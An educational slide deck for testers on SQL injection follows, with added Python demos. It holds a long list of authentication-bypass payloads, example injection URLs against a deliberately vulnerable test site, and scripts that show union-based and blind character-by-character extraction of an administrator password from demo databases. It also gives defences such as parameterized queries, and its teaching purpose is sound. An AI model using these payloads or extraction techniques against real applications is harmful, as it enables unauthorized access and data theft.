SQL Injections
Every Tester Needs To Know
BY VLADIMIR ARUTIN
ABOUT MYSELF
VLADIMIR ARUTIN
SENIOR QA at AB SOFT
ISTQB Certified Test Manager
ISTQB and QA Manual Training Instructor
Certified Coach, Public Speaker
OWASP TOP 10
1. INJECTION
2. BROKEN AUTHENTICATION
3. SENSITIVE DATA EXPOSURE
4. XML EXTERNAL ENTITIES (XXE)
5. BROKEN ACCESS CONTROL
6. SECURITY MISCONFIGURATION
7. CROSS-SITE SCRIPTING
8. INSECURE DESERIALIZATION
9. USING COMPONENTS WITH KNOWN VULNERABILITIES
10. INSUFFICIENT LOGGING AND MONITORING
TYPES OF INJECTIONS
SQL
HTML
XML
Shell-command
Code
Log file
LDAP
SSI
XPath
XAML
WHAT’S THE POINT
EXAMPLES
<h1>hacked</h1>
EXAMPLES
Web application template for search results page, the user query text, and the generated results (screenshots not included)
EXAMPLES
<user>
<uname>qalab</uname>
<pwd>123456789</pwd>
<role>user</role>
<email>arutin.vladimir@gmail.com</email>
</user>
<user>
<uname>qalab</uname>
<pwd>123456789</pwd>
<role>user</role>
<email>arutin.vladimir@gmail.com</email>
</user>
…
<user>
<uname>Bill</uname>
<pwd>msk*Q^08f5WspV</pwd>
<role>administrator</role>
<email>bill.gates@microsoft.com</email>
</user>
EXAMPLES
Value submitted in the email field: hack</email><role>administrator</role><email>arutin.vladimir@gmail.com
The back-end pasted it into the XML without escaping, so the document now carries a second <role> element:
<user>
<uname>qalab</uname>
<pwd>123456789</pwd>
<role>user</role>
<email>hack</email>
<role>administrator</role>
<email>arutin.vladimir@gmail.com</email>
</user>
Top Programming Languages 2020
Vulnerable programming languages, 2010-2019
WHEN YOU'RE REMINDED THAT you wrote the world's biggest social network in PHP
TOTAL REPORTED OPEN SOURCE VULNERABILITIES PER LANGUAGE
SQL INJECTIONS
HOW DOES IT HAPPEN?
A web application does not validate values received from a web form, cookie, input parameter, etc., before passing them to SQL queries.
Your code uses unsanitized data from user input to build SQL statements as text
A malicious user includes SQL syntax (quotes, operators, comment markers, UNION) in the input
Your code executes these SQL elements as part of what it believes is a legitimate SQL statement
EXAMPLES
SELECT * FROM users WHERE username = 'admin'--' AND password = 'password'
SELECT * FROM users WHERE username = "" or ""="" AND password = "" or ""=""
SELECT * FROM clients WHERE clientID = 105 OR 1=1
SQL INJECTIONS EXAMPLES
Email input: qalab@gmail.com
Password input: xxx') OR 1=1--]
Resulting query: SELECT * FROM users WHERE email='qalab@gmail.com' AND password=md5('xxx') OR 1=1--]');
Everything after -- is a comment, so the closing ') is ignored and OR 1=1 makes the WHERE clause true for every row.
SQL INJECTIONS vocabulary
Comment markers are dialect-specific: -- ends the line in most databases (MySQL requires a space after it), # is MySQL-only, /* opens a block comment.
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin' or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
(81dc9bdb52d04dc20036dbd8313ed055 is md5("1234"): the UNION row supplies both the username and the hash of the password the attacker will type)
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin" or 1=1 or ""="
admin" or 1=1
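The following is an added example (not code from the original deck) that puts the "HOW DOES IT HAPPEN?" explanation and a few payloads from the vocabulary list side by side with a parameterized query. It uses SQLite as a stand-in for the MySQL back-end of the slides; the users table and its rows are constructed for the demo, and the plaintext password column is a simplification.

```python
import sqlite3

# Constructed sample data, not from the original deck: one ordinary user and
# one administrator. Passwords are stored in plaintext only to keep the demo
# short; a real application would store a salted hash.
USERS = [
    ("qalab", "123456789", "user"),
    ("Bill", "msk*Q^08f5WspV", "administrator"),
]


def make_db():
    """In-memory SQLite database standing in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uname TEXT, pwd TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, uname, pwd):
    """The bug from 'HOW DOES IT HAPPEN?': input pasted into the SQL text.

    A quote in the input closes the string literal, and everything after it
    is parsed as SQL, so a comment marker drops the password check entirely.
    """
    sql = ("SELECT uname, role FROM users WHERE uname = '" + uname
           + "' AND pwd = '" + pwd + "'")
    return conn.execute(sql).fetchone()  # (uname, role) or None


def login_safe(conn, uname, pwd):
    """Same query as a parameterized statement.

    The driver sends the query text and the values separately, so a quote or
    '--' in the input is compared as data and can never change the query.
    """
    sql = "SELECT uname, role FROM users WHERE uname = ? AND pwd = ?"
    return conn.execute(sql, (uname, pwd)).fetchone()


# Payloads from the vocabulary list, as (username field, password field).
# SQLite treats '--' as a line comment like MySQL does; the '#' variants are
# MySQL-only and would be a syntax error here.
PAYLOADS = [
    ("Bill'--", "wrong"),            # comments out "AND pwd = ..." entirely
    ("Bill' or '1'='1", "wrong"),   # uname='Bill' OR ('1'='1' AND pwd='wrong')
    ("' or 1=1--", "wrong"),         # no username at all: the first row wins
]


def run_payloads(conn):
    """Return [(payload, vulnerable result, safe result)] for every payload."""
    results = []
    for uname, pwd in PAYLOADS:
        results.append((uname,
                        login_vulnerable(conn, uname, pwd),
                        login_safe(conn, uname, pwd)))
    return results


if __name__ == "__main__":
    db = make_db()
    for payload, vulnerable, safe in run_payloads(db):
        print(f"{payload!r:22} vulnerable -> {vulnerable}   parameterized -> {safe}")
```

Run it and the vulnerable login returns the administrator row for the first two payloads and the first user in the table for the third, while the parameterized login returns nothing for all three and still works for the real credentials. Note the operator precedence in the second payload: AND binds tighter than OR, which is why the password check is neutralized even though it is still in the query.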
SQL Injection Types
Error-based SQL injection
• The attacker crafts the payload so that the back-end raises a database error
• The back-end returns the error text to the attacker
• The attacker uses the information in the error to escalate the attack
• Used to learn about the database: engine type and version, table and column names, file paths, and more
SQL Injection Types
Error-based SQL injection
Example: http://testphp.vulnweb.com/listproducts.php?cat=1'
Result: The web application displays the following error in the browser:
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
SQL Injection Types
Union-based SQL injection
• The attacker appends a UNION SELECT clause to the payload, with the same number of columns as the original query
• The SQL engine combines the rows the page was meant to show with rows the attacker selected from other tables
• The web application renders the combined result and so displays the sensitive information
SQL Injection Types
Union-based SQL injection
Example: http://testphp.vulnweb.com/artists.php?artist=-1 UNION SELECT 1,version(),current_user()
Result: The web application displays the database version and the name of the current database user:
5.1.73-0ubuntu0.10.04.1
acuart@localhost
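The two steps of a union-based attack, as an added example (not code from the original deck): first the column count is discovered from the database's error messages (the error-based technique from the previous slide), then the padded UNION SELECT pulls data from a table the page never queries. SQLite stands in for MySQL, so sqlite_version() plays the role of version(); the artists and users tables and their rows are constructed for the demo.

```python
import sqlite3

# Constructed sample data, not from the original deck: the artists table the
# vulnerable page reads from, and a users table the page never meant to show.
ARTISTS = [(1, "Blad3", "bio of artist 1"), (2, "r4w8173", "bio of artist 2")]
USERS = [("Bill", "msk*Q^08f5WspV", "administrator")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (id INTEGER, name TEXT, bio TEXT)")
    conn.execute("CREATE TABLE users (uname TEXT, pwd TEXT, role TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?, ?)", ARTISTS)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def artist_page(conn, artist_param):
    """Stand-in for artists.php?artist=<value>: a numeric parameter glued into
    the query without quotes, so the payload needs no quote character."""
    sql = "SELECT id, name, bio FROM artists WHERE id = " + artist_param
    return conn.execute(sql).fetchall()


def find_column_count(conn, max_cols=10):
    """Error-based step: probe UNION SELECT NULL, NULL, ... until the database
    stops reporting a column-count mismatch. Returns (count, errors_seen)."""
    errors = []
    for n in range(1, max_cols + 1):
        payload = "-1 UNION SELECT " + ", ".join(["NULL"] * n)
        try:
            artist_page(conn, payload)
            return n, errors
        except sqlite3.OperationalError as err:
            # The error text is exactly what an error-based attacker reads;
            # a page that hides it forces the slower blind techniques instead.
            errors.append(str(err))
    return None, errors


def dump_via_union(conn, ncols):
    """Union-based step: pad to the discovered column count and place the
    interesting expressions in columns the page renders (name and bio)."""
    if ncols is None or ncols < 3:
        raise ValueError("need at least three rendered columns for this demo")
    cols = ["NULL"] * ncols
    cols[1] = "(SELECT pwd FROM users WHERE role = 'administrator')"
    cols[2] = "sqlite_version()"   # plays the role of version() on the slide
    payload = "-1 UNION SELECT " + ", ".join(cols)
    # id = -1 matches no artist, so the only row rendered is the attacker's.
    (_, admin_pwd, version), = artist_page(conn, payload)
    return admin_pwd, version


if __name__ == "__main__":
    db = make_db()
    ncols, errors = find_column_count(db)
    print("error messages seen:", errors)
    print("column count:", ncols)
    print("admin password, engine version:", dump_via_union(db, ncols))
```

The -1 in the payload is deliberate: it empties the legitimate half of the UNION so the attacker's row is the only one on the page, which is why the slide's URL also starts with artist=-1.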
SQL Injection Types
Boolean-based SQL injection
• The attacker sends many payloads that make the application return a different result depending on whether an injected condition is TRUE or FALSE
• The attacker draws a conclusion from the application's behaviour for each payload
• Often used to confirm that a parameter is injectable before trying other techniques, but it can also extract sensitive information one TRUE/FALSE answer at a time
SQL Injection Types
Boolean-based SQL injection
Payload 1: http://testphp.vulnweb.com/artists.php?artist=1 AND 1=1
Payload 2: http://testphp.vulnweb.com/artists.php?artist=1 AND 1=0
Result: The application responds differently to the two payloads (the artist is shown for the TRUE condition and not for the FALSE one), so the parameter is being evaluated as SQL. The attacker now knows the application is vulnerable to SQL injection.
SQL Injection Types
Time-based SQL injection
The attacker sends a payload that includes a time-delay function such as SLEEP(), which delays the whole response when the injected expression is evaluated
The attacker repeats the process as many times as needed with different arguments
Used to read the content of a database cell a character at a time: each request tests one candidate character value (for example by its ASCII code) with the delay attached to the TRUE branch, and the response time is the answer
SQL Injection Types
Time-based SQL injection
Example: http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(3)
Result: The page loads with a delay of about three seconds (in MySQL SLEEP(3) returns 0, so 1-SLEEP(3) still selects artist 1 after the pause). The parameter is vulnerable to SQL injection.
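The character-at-a-time extraction that the boolean-based and time-based slides describe, as an added example (not code from the original deck). The oracle is the boolean one from the slide, "artist=1 AND <condition>": the artist row is returned when the condition holds and nothing when it does not. A time-based attack uses the same loop with the oracle replaced by a response-time measurement; SQLite, used here as a stand-in for MySQL, has no SLEEP(), so that variant is not shown. The tables, rows and the users subquery are constructed for the demo.

```python
import sqlite3

# Constructed sample data, not from the original deck.
ARTISTS = [(1, "Blad3", "bio of artist 1")]
USERS = [("Bill", "msk*Q^08f5WspV", "administrator")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE artists (id INTEGER, name TEXT, bio TEXT)")
    conn.execute("CREATE TABLE users (uname TEXT, pwd TEXT, role TEXT)")
    conn.executemany("INSERT INTO artists VALUES (?, ?, ?)", ARTISTS)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def artist_page(conn, artist_param):
    """Stand-in for artists.php?artist=<value> with the parameter concatenated."""
    sql = "SELECT id, name, bio FROM artists WHERE id = " + artist_param
    return conn.execute(sql).fetchall()


class Oracle:
    """TRUE/FALSE oracle from the slide: 'artist=1 AND <condition>' shows the
    artist when the condition holds and an empty page when it does not.
    Counts queries so the cost of blind extraction is visible."""

    def __init__(self, conn):
        self.conn = conn
        self.queries = 0

    def ask(self, condition):
        self.queries += 1
        return len(artist_page(self.conn, "1 AND (" + condition + ")")) > 0


def extract_string(oracle, subquery, max_len=64):
    """Recover the result of `subquery` one character at a time.

    Each position is found by binary search on its code point using
    unicode(substr(...)) comparisons: 7 TRUE/FALSE answers per character
    instead of one answer per candidate character.
    """
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle.ask(f"length(({subquery})) >= {pos}"):
            break                    # past the end of the value
        lo, hi = 0, 127              # printable data is in the ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


# Hypothetical target: the administrator's password in the demo users table.
ADMIN_PWD = "SELECT pwd FROM users WHERE role = 'administrator'"


def extract_admin_password(conn):
    """Run the attack and return (recovered value, number of requests used)."""
    oracle = Oracle(conn)
    value = extract_string(oracle, ADMIN_PWD)
    return value, oracle.queries


if __name__ == "__main__":
    value, n = extract_admin_password(make_db())
    print(f"recovered {value!r} with {n} requests")
```

For the 14-character demo password this costs 113 requests: one length check plus seven comparisons per character, and a final length check that fails. That request volume, against a single parameter, is what a tester should expect to see in the web server logs when someone runs a blind attack, and it is why "Continuously monitor SQL statements" appears in the protection list.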
DEMO TIME
WARNING
DON’T TRY THIS AT HOME
VLADIMIR ARUTIN, AB SOFT COMPANY AND IT STEP UNIVERSITY
DO NOT ADVOCATE REPLICATING THE ACTIONS IN THIS DEMO
AND DO NOT TAKE RESPONSIBILITY FOR THOSE WHO DO.
For Educational Purposes Only
How can you protect yourself?
Parameterized statements (prepared statements with bound variables): the primary defense
Stored procedures (only if they do not build dynamic SQL from their arguments)
Web application firewall (defense in depth, not a substitute for fixing the code)
Whitelist input validation
Escaping all user-supplied input (last resort: database-specific and easy to get wrong)
Use LIMIT in SQL queries
Trust no one
Update and patch
Use appropriate privileges (the application's database account should not own the schema or read tables it does not need)
Continuously monitor SQL statements from DB-connected apps
Buy better software
EXAMPLE OF PROTECTION
// Requires java.sql.Connection, DriverManager, PreparedStatement and ResultSet.
// Define which user we want to find.
String email = "user@email.com";
// Connect to the database.
Connection conn = DriverManager.getConnection(URL, USER, PASS);
// Vulnerable version, for contrast: the value is concatenated into the SQL text,
// so an email of  x' OR '1'='1  changes the query itself.
// String sql = "SELECT * FROM users WHERE email = '" + email + "'";
// ResultSet results = conn.createStatement().executeQuery(sql);
// Protected version: the SQL text contains only a placeholder...
String sql = "SELECT * FROM users WHERE email = ?";
PreparedStatement stmt = conn.prepareStatement(sql);
// ...and the value is bound separately, so it is always treated as data.
stmt.setString(1, email);
ResultSet results = stmt.executeQuery();
while (results.next()) {
    // ...do something with the data returned.
}
CONCLUSION
BONUS
Danger is everywhere
DEMO TIME
THANKS FOR WATCHING
AND
God bless your Data base